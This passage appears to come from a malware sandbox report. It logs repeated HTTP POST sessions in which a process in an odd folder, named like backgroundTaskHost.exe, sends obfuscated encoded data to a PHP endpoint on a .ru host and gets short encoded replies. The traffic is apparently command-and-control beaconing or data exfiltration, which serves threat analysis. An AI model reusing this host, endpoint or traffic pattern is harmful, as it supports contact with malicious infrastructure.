                                                                                          Jan 4, 2025 11:08:25.279809952 CET2520OUTData Raw: 54 5f 5e 52 55 5b 5a 56 5c 5b 52 58 57 5b 58 58 58 52 5a 52 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^RU[ZV\[RXW[XXXRZRRPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>_+4217Y),#=!Y'Q7:(,(*&8 !*!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:25.382719994 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:25.649338007 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLJAW84gG0jjloh9CxYCaLsCtFJSNjC7kxAxNA78OXvatBCRJotKUHYHYaIKIUlB%2BMyi6mRqsPZqaXtDGElyhX00bzYVWwEpW9Lm5ejzwqTdgomAvNDa6sgsE%2FOoCfUvtHb966kR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d5e5a3f0cbc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3434&min_rtt=1595&rtt_var=4278&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=89493&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          53192.168.2.449959104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:25.865648985 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:26.219058037 CET2520OUTData Raw: 54 5f 5e 5e 50 5e 5a 5d 5c 5b 52 58 57 5f 58 5f 58 53 5a 5e 52 57 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^^P^Z]\[RXW_X_XSZ^RWQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>9 8520+_**#.)Y$>#R4V(,,(6##)!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:26.317733049 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:26.496916056 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj1im37mNKXtNsGW%2BEgPXnRFUU45aTk797jTvVp0SXh0y5VTP%2BtfHFOBk5MiocubgeIpMV%2FFYP6J%2BnQPK1aPwLfInNTTIOuFY0Guy0BMoVZItznoXZxOcAzEeY4nOr3ueJBExfsp"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d643bee427c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3482&min_rtt=1588&rtt_var=4383&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=87211&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          54192.168.2.449965104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:26.658226013 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:27.014198065 CET2520OUTData Raw: 54 5d 5e 53 55 58 5f 53 5c 5b 52 58 57 5f 58 5e 58 52 5a 5d 52 54 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^SUX_S\[RXW_X^XRZ]RTQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B))? (=V% ;_*<65>)&.?7>-(8+5$4Y*;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:27.131364107 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:27.388319969 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FiL9N1d6pjmatr9QOaPsP4u11WeKAespUHeS8yA9D35Yt1KjroVTxSX4NrtFZtle1RWe9W1Pn%2BszHzePVz%2B12nOqo1W3EehRzKPKsoSaws2Oc10XEuifZNN3g4Su89py%2FsgLRNP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d694daf4229-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=10570&min_rtt=2492&rtt_var=17091&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=21752&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          55192.168.2.449971104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:27.563034058 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:27.920432091 CET2520OUTData Raw: 54 5a 5e 57 55 5d 5a 54 5c 5b 52 58 57 53 58 5d 58 52 5a 5f 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^WU]ZT\[RXWSX]XRZ_R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@**47;)2#\)56>9]';Q7&??0<&; )!Y#!Y,
                                                                                          Jan 4, 2025 11:08:28.006607056 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:28.276791096 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WsBuPC1K820XkkUaGgcjgdS3HFuyORC3nxs67vAnPwH4XPXjkuc%2FlxOJ8OPrxrcOYXY1yips9lM6jRSBoNeMZZ1evnV9xgoUfzk0daPU6Db2cEDMjjJwBCxCpmNCsQuayJBwnG1O"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d6ecacc42d5-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3085&min_rtt=2395&rtt_var=2278&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=184413&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          56192.168.2.449977104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:28.466058016 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:28.811028004 CET2520OUTData Raw: 51 5e 5e 53 55 5e 5a 53 5c 5b 52 58 57 5e 58 52 58 53 5a 5d 52 5d 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^SU^ZS\[RXW^XRXSZ]R]QX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=)+7(:% >.6-0X7 .+/_("-2X*+!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:28.918373108 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:29.187083006 CET812INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFEii%2FL8TZSluILZZbHvW%2FsfPQaUyWoQQMEPD2YVP0J5%2FR2gsUGrJrZlHAIPRZ2oQFQMb9PstuYdzPiuXS4DXI%2Fa0nPLjMFC%2B%2F49zKspEE8dwtOkYHaDO3KJ3eqmUXG2MUf0TD%2Bz"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d747ed0425c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4852&min_rtt=1889&rtt_var=6636&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=57031&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          57192.168.2.449978104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:29.442920923 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          58192.168.2.449984104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:29.738935947 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:30.092278957 CET1844OUTData Raw: 54 50 5e 5f 50 59 5f 50 5c 5b 52 58 57 5e 58 5a 58 56 5a 58 52 5d 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^_PY_P\[RXW^XZXVZXR]Q^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*:3C"82 +X=1\"-&.?#->V?<(&$ .:[)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:30.202022076 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:30.462202072 CET957INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwm6zlPipTsSi4142XNLmcb7YvNKN6tnxTAVe0Z3nmtS7uX3vhb%2FFRoAFbUYzqys618bgZmsJoJlyj0sE%2FjiGzO3m%2B%2BtWWCGeGVCavKznZZuJvA4m3Nt3SxGzbsj%2BHWA4P3gXns9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d7c7d6342fb-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4659&min_rtt=1724&rtt_var=6517&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=57915&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1e 28 10 2c 56 21 2f 28 59 2a 2d 22 10 32 30 2c 58 2c 31 37 5f 34 3c 30 06 38 1c 26 03 27 1d 2c 5f 29 01 3c 50 37 0e 38 08 30 30 2a 5d 06 12 38 1d 3c 12 32 5d 25 5d 21 0c 3d 31 31 1c 27 08 25 01 33 3d 30 05 2b 3f 22 04 26 2c 18 0e 2a 2f 36 5e 39 03 27 1e 2c 3f 3c 1d 20 29 21 53 08 13 23 0e 24 21 3b 57 28 20 26 01 25 1d 13 5b 24 5c 28 09 3e 5e 37 0d 27 07 36 5c 2d 1f 2c 01 3f 55 28 12 2e 2e 33 02 3f 3d 20 0f 24 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(,V!/(Y*-"20,X,17_4<08&',_)<P7800*]8<2]%]!=11'%3=0+?"&,*/6^9',?< )!S#$!;W( &%[$\(>^7'6\-,?U(..3?= $"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          59192.168.2.449985104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:30.061341047 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:30.420392036 CET2520OUTData Raw: 51 5a 5e 53 50 5f 5a 5d 5c 5b 52 58 57 5b 58 5a 58 57 5a 5e 52 50 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^SP_Z]\[RXW[XZXWZ^RPQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(*?762)1".6'X<#:S?<&7=!*+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:30.504677057 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:30.763855934 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGETJweslnImUc7wTJYM2LML0SdMgqU15NWA0FcXo%2BJWPMIjJYfWGTVQS5Rk7bYcdxwyopyQbbObAshiVCCfIetaIf3kbzrw3Ij9lkYeFPDXmr7xsCZQiv9qagf46soGrOUSQlNA"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d7e6d9af5fa-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2567&min_rtt=1625&rtt_var=2494&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=159336&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          60192.168.2.449991104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:30.891230106 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:31.248611927 CET2520OUTData Raw: 51 5c 5b 57 55 58 5f 51 5c 5b 52 58 57 58 58 5d 58 5c 5a 5e 52 5d 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\[WUX_Q\[RXWXX]X\Z^R]QY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=*3@#+%1;=/9"-5&>?79+0?8 -[++!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:31.359905958 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:31.631006956 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drkwA%2Bn1F4JwULB1OkhEBCSh3VYFqc2g8RLPThNh5Tzk7xoig%2BTv7mYBjp3RrJzzw0D1egiipSNhngOkNRSMvq%2B5sm1TbGhww3DorYzaxDsfSmnugJoorIFTf%2FrQ%2BjbQ60xjtuTj"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d83bb568cdd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4838&min_rtt=1967&rtt_var=6481&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=58538&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          61192.168.2.449997104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:32.045197010 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:32.389277935 CET2520OUTData Raw: 51 5c 5e 51 50 5f 5a 56 5c 5b 52 58 57 53 58 58 58 53 5a 5f 52 56 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^QP_ZV\[RXWSXXXSZ_RVQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*),#)23+*9!9]0;#S(8(( .9*;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:32.497493029 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:32.760770082 CET812INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09uJRjIz%2BrKpV88Lz9yKlY%2BnxutSyVokhIX4ajleZo78%2FJ1IQHxEHOFLQ00TppjPtFvevkjuZqHeRehehVlE4SsOfjv%2FInFAH4nZU2U%2BMD6kbZ%2FLSJ51w%2BAcYMyrNnpfdC4cMql7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d8ade820f5d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4412&min_rtt=1473&rtt_var=6432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58418&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          62192.168.2.450002104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:32.893528938 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
